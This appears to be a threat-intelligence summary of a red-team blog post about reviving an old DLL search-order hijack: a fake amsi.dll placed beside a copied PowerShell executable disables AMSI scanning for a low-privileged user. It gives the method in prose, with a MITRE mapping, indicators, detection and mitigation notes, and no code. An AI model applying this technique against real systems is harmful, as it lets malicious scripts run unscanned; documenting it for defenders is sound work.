Full Report
While working on DoubleAgent as part of the Introduction To Red Teaming course we’re developing for RingZer0, I had a look at Anti-Malware Scan Interface (AMSI) bypasses. One of the objectives I had was to find a new way to evade AMSI. As with my DoubleAgent work, this did not lead to the identification of a novel finding, but instead revealed that old techniques can be revived with minimal work. This blog post describes how to resurrect the original DLL hijack documented by Cn33liz by extending it to simply define the typically exported functions found in amsi.dll in a fake DLL. This gives a low privileged user an AMSI bypass if they can write to a directory.
Analysis Summary
# Tool/Technique: Resurrected AMSI DLL Hijack Bypass
## Overview
This technique resurrects an old DLL hijacking method to achieve an Anti-Malware Scan Interface (AMSI) bypass, primarily targeting PowerShell execution. The bypass is achieved by creating a fake `amsi.dll` that exports the necessary functions found in the legitimate DLL. If the attacker has write access to a specific directory searched during the loading process, they can trick the process (like PowerShell) into loading their malicious DLL instead of the legitimate one, effectively disabling AMSI scans for that session.
## Technical Details
- Type: Technique
- Platform: Windows (targeting PowerShell, which uses AMSI)
- Capabilities: Bypassing AMSI functionality for script execution within the compromised process (e.g., PowerShell).
- First Seen: The original technique was documented circa 2016; this report details its successful resurrection in June 2020 using updated knowledge of required exports.
## MITRE ATT&CK Mapping
- TA0005 - Defense Evasion
- T1574 - Hijack Execution Flow
- T1574.001 - DLL Search Order Hijacking (Specific application: Hijacking the loading of `amsi.dll`)
## Functionality
### Core Capabilities
- **DLL Creation:** Creating a custom DLL (named `amsi.dll`) that implements the minimum required 7 exported functions documented by Microsoft for AMSI interaction.
- **DLL Hijacking:** Placing this fake DLL in a directory searched by the host process (e.g., PowerShell) according to the Windows DLL Search Order, ensuring it loads before the legitimate system DLL.
### Advanced Features
- **Low-Privilege Evasion:** The technique can be highly effective for low-privileged users if they can write to paths relevant to the application's search order (e.g., copying the PowerShell executable and the fake DLL to a user-writable folder).
- **Reviving Old Methods:** Demonstrates that minimal effort on well-documented, older techniques can yield functional bypasses if protective hardening (which relies on specific application behavior) has degraded or changed.
## Indicators of Compromise
- File Hashes: Not explicitly provided in the text for the malicious DLL.
- File Names: `amsi.dll` (the malicious version).
- Registry Keys: None explicitly mentioned as part of the exploit mechanism itself.
- Network Indicators: None specified, as this technique is local bypass.
- Behavioral Indicators:
- Successful loading and execution of an unsandboxed PowerShell script immediately following the placement of the custom DLL.
- Unexpected process loading behavior related to `amsi.dll` resolution, observable via tools like ProcMon focusing on DLL load paths.
## Associated Threat Actors
- Not associated with specific known threat actor groups; this was developed in the context of a Red Teaming course demonstration.
## Detection Methods
- **Signature-based detection:** Windows Defender was noted to have added capabilities to detect the file copy of the malicious DLL into user-controllable folders shortly after the technique was tested.
- **Behavioral detection:** Monitoring for anomalous DLL loading behavior, particularly for critical system DLLs like `amsi.dll`, or monitoring processes that alter the environment to control DLL search paths.
- **YARA rules:** Not provided in the text, but could be developed to detect the specific skeleton implementation of the 7 required AMSI functions in an executable file.
## Mitigation Strategies
- **Prevention:** Keeping endpoint security solutions (like Windows Defender) updated, as newer versions showed capability to detect the file placement associated with this low-privilege bypass.
- **Hardening recommendations:** Ensuring processes adhere strictly to secure DLL loading practices, potentially restricting write access to critical application directories where DLLs might be searched. Disabling PowerShell execution paths that run from user-writable locations can also limit success.
## Related Tools/Techniques
- Original DLL hijack documented by Cn33liz.
- DoubleAgent (mentioned as context for the research).
- Other AMSI Bypass Techniques documented in public repositories (e.g., S3cur3Th1sSh1t/Amsi-Bypass-Powershell).